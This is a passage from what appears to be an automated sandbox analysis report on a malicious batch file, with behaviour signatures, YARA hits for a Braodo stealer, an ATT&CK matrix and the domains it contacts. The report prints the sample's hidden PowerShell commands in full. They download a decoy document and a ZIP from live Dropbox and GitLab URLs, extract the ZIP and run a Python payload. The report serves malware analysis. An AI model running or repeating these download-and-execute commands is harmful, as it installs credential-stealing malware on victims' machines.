                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 3475 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 6425 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep count: 4019 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep count: 2806 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5056Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep count: 5807 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep count: 3974 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 4221 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 2508 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep count: 3629 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep count: 86 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV0T
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_5272.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_5260.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5260, type: MEMORYSTR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngadsfkgj17.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip', 'c:\users\public\document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip', 'c:\users\public\document.zip')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Braodo
                  Source: Yara matchFile source: amsi64_5260.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_2188.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5260, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Braodo
                  Source: Yara matchFile source: amsi64_5260.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_2188.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5260, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information11
                  Scripting                  		Valid Accounts1
                  Command and Scripting Interpreter                  		11
                  Scripting                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping11
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Process Injection                  		Security Account Manager21
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Obfuscated Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  hngadsfkgj17.bat3%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com/cd/0/get/CghiprcqMx-t_0kStAteoG_83aAw0%Avira URL Cloudsafe
                  http://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                  https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                  http://www.apache.o0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  edge-block-www-env.dropbox-dns.com
                  		162.125.69.15
                  		truefalse
                    		high
                    gitlab.com
                    		172.65.251.78
                    		truefalse
                      		high
                      www-env.dropbox-dns.com
                      		162.125.69.18
                      		truefalse
                        		high
                        ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com
                        		unknown
                        		unknownfalse
                          		unknown
                          www.dropbox.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zipfalse
                              		high
                              https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://gitlab.compowershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF13D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.dropbox.com/service_worker.jspowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://gitlab.com/-/sandbox/;powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://gitlab.com/users/sign_inpowershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://go.microsoft.copowershell.exe, 00000010.00000002.2544841727.0000029579508000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://paper.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.microsoftpowershell.exe, 00000010.00000002.2540762014.00000295771D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.dopowershell.exe, 0000000C.00000002.2304178313.000001FEF6766000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.hellofax.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://pal-test.adyen.compowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.dropbox.compowershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.dopowershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Licensepowershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://snowplow.trx.gitlab.netpowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://app.hellosign.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.hellosign.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
